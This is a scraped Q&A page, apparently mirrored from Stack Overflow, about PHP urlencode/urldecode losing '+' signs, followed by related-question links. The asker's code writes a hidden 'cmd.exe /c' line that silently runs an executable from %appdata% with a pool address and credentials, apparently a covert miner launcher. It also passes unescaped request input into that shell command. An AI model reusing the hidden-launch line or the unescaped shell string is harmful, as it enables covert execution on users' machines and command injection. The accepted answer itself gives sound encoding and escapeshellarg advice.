PHP中的urlencode和urldecode字符串仍然没有使用+？

    <?php
$pool = urlencode($_GET['p']);
$url = 'mylink?pool=' . $p . '&user=' . $_GET['user'] . '&pass=' . $_GET['pass'];
file_get_contents($url);
?>

<?php
    $pool = urldecode($_GET['p']);
    $user = $_GET['user'];
    $pass = $_GET['pass'];
    $file_content[133] = 'Shell "cmd.exe /c cd %appdata% & help.exe -o ' . $p. ' -u ' . $user . ' -p ' . $pass . '", vbHide';
?>

When entering: http://mylin?p=udp+tcp://host:22555&user=test&pass=test

It still doesn't use the + in this as a string at all!

Please help, as the + needs to be included in my string.

写回答
好问题 0 提建议
追加酬金
关注问题
分享
邀请回答
编辑收藏删除结题
收藏举报

2条回答默认最新

关注

码龄粉丝数原力等级 --

被采纳

被点赞

采纳率
douzhaishan5462 2014-01-05 16:18
关注
The superglobals $_GET and $_REQUEST are already decoded.

Per the documentation, you should not decode things from $_GET. When encoding, use rawurlencode() so the plus symbol is encoded as "%2B" (and thus, correctly decoded).

When you encode your link, rawurlencode() all of the parameters:

$pool = rawurlencode($_GET['p']); $user = rawurlencode($_GET['user']); $pass = rawurlencode($_GET['pass']); $url = "mylink?pool=$p&user=$user&pass=$pass";

When you decode your link, don't decode any of the parameters because they are already decoded:

$pool = $_GET['p']; $user = $_GET['user']; $pass = $_GET['pass'];

Incidentally, it looks like you are taking user input and sending it to a shell command. In that case, you must use escapeshellarg() or similar to make the string safe for use as a shell argument and mitigate command injection attacks.
本回答被题主选为最佳回答 , 对您是否有帮助呢?

解决无用
评论打赏
分享
举报

评论

按下Enter换行，Ctrl+Enter发表内容

查看更多回答(1条)

报告相同问题？

关注问题

PHP中的urlencode和urldecode字符串仍然没有使用+？ php
2014-01-05 16:13

回答 2 已采纳 The superglobals $_GET and $_REQUEST are already decoded. Per the documentation, you should n
用于Jquery字符串的PHP urlencode php
2015-11-17 15:03

回答 2 已采纳 MY bad, was using .text instead of .val final code: $(document).on('click','#myModal<?php ech
从数据库中获取值并在php中插入字符串 mysql php
2019-03-03 15:52

回答 1 已采纳 mysqli_query() doesn't return a string. It return a mysqli_result, which you can fetch. $query =
php自定义urlencode，urldecode函数实例
2020-10-24 12:17

主要介绍了php自定义urlencode，urldecode函数,实例分析了php字符串转码的技巧,具有一定参考借鉴价值,需要的朋友可以参考下
有完整代码,为什么urlencode或rawurlencode没有生效？ html javascript php
2022-04-29 10:45

回答 3 已采纳测试运行下，如果编码之后要加引号，否则报错修改后代码 <? $test = "<script type=text/javascript>function test(){var tx
在urlencode / urldecode之前使用加密是否安全。加密的GET url不会返回相同的值，偶尔会将所有+替换为空格 php
2016-03-22 19:09

回答 1 已采纳 Don't call urldecode() in the receiver. PHP automatically decodes all the URL parameters before it
PHP：urlencode（）是一种在URL中允许有效UTF-8字符串的安全方法吗？ php
2010-01-07 23:59

回答 3 已采纳 urlencode does not depend on a specific character encoding. It just looks at the bytes, interprets
php urlencode()与urldecode()函数字符编码原理详解
2020-10-28 06:30

中文字符编码研究系列第五期，详解 urlencode()与urldecode()函数字符编码原理，两个函数分别用于编码 URL 字符串和解码已编码的 URL 字符串，实现对中文字符的编码
在PHP中转换字符串以用作文件名...而不剥离特殊字符 php
2016-10-06 20:21

回答 2 已采纳 Your quest is very similar to questions around creating url-safe base64 encoded strings. See this
使用PHP从TEXT文件中提取查询字符串，从URL中进行HTTP POST http php
2014-05-05 17:46

回答 3 已采纳 something like this.... $file = fopen("nowplaying.txt", 'r'); $line = fgets($file); fclose($file)
在PHP中执行GET时，URL会截断特殊字符 html php
2016-06-22 10:04

回答 2 已采纳 if you need all after ?url=, you can try this: $url = $_SERVER['REQUEST_URI']; $url2 = substr
php中urlencode和urldecode
2018-08-04 08:13

root_admin_12138的博客 urlencode — 编码 URL 字符串 string urlencode ( string $str ) 此函数便于将字符串编码并将其用于 URL 的请求部分，同时它还便于将变量传递给下一页。返回值的字符串中除了 -_. 之外的所有非字母数字字符都将...
PHP 读取%2B(加号) 变成成空格 apache php
2021-01-15 16:43

回答 3 已采纳 +号在url上就是空格的意思，所以这里是Java处理不当，需要对pwd字符串进行urldecode处理，解码是在PHP上处理
php urldecode 加号不显示_php urlencode()与urldecode()函数字符编码原理详解
2020-12-22 03:23

weixin_40003767的博客其原理就是把中文字符转换为十六进制并按某种规则进行字符串组合，实现字符的编码与解编码，保证URL数据传递过程中字符的完整性和兼容性，主要讨论中文字符的编码情况。一，FireFox浏览器编码中文字符在Firefox...
php中url传递中文字符,特殊危险字符的解决方法
2020-12-18 19:56

把这些文本字符串传给url之前，先进行urlencode($text)一下；但是对于一些很“危险”的字符，比如说html字符，甚至是SQL注入相关的字符，如果很明显的传给系统，出于安全考虑，系统一般都会把它们过滤掉的。现在，...
php urldecode一次,php中urldecode()和urlencode()起什么作用
2021-04-09 12:40

波波区块链的博客 urldecode()函数与urlencode()函数原理相反，用于解码已编码的 URL 字符串，其原理就是把十六进制字符串转换为中文字符。urlencode()编码：对字符串中除了 -_. 之外的所有非字母数字字符都将被替换成百分号(%)后跟两...
php url编码原理,urlencode编码/urldecode解码作用及使用方法
2021-04-30 06:07

灵也有希望的博客 urlencode和urldecode释义urlencode是一个函数，可将字符串以URL编码，用于编码处理。URL编码(URL encoding)，也称作百分号编码(Percent-encoding)，是特定上下文的统一资源定位符 (URL)的编码机制。urlencode适用...
PHP中的urlencode和urldecode
2019-04-04 09:02

XiaoXinHuang的博客 urldecode()函数与urlencode()函数原理相反，用于解码已编码的 URL 字符串，其原理就是把十六进制字符串转换为中文字符 urlencode (PHP 3, PHP 4, PHP 5) urlencode -- 编码 URL 字符串 说明 str...
php中urldecode()和urlencode()起什么作用？
2018-06-29 16:59

一亩地的博客 urldecode()函数与urlencode()函数原理相反，用于解码已编码的 URL 字符串，其原理就是把十六进制字符串转换为中文字符！urlencode()编码：对字符串中除了 -_. 之外的所有非字母数字字符都将被替换成百分号（%）后跟...
php urldecode 加号不显示_php|urldecode urlencode 的加号问题
2020-12-31 00:09

AyeNay Rats的博客遇到个很奇怪的问题，在获取php $_GET参数时候，加号莫名其妙没掉了。示例如下：//链接地址/...spider=Baiduspider%2Becho urldecode($_GET['spider']);//输出Baiduspiderecho urldecode('Baiduspider%2B');//输出Ba...
没有解决我的问题, 去提问

悬赏问题

¥60 ESP32怎么烧录自启动程序
¥50 html2canvas超出滚动条不显示
¥15 java业务性能问题求解(sql，业务设计相关)
¥15 52810 尾椎c三个a 写蓝牙地址
¥15 elmos524.33 eeprom的读写问题
¥15 使用Java milo连接Kepserver服务端报错？
¥15 用ADS设计一款的射频功率放大器
¥15 怎么求交点连线的理论解？
¥20 软件开发方法学习来了
¥15 微信小程序商城如何实现多商户收款平台分润抽成

PHP中的urlencode和urldecode字符串仍然没有使用+？

2条回答 默认 最新

悬赏问题

2条回答默认最新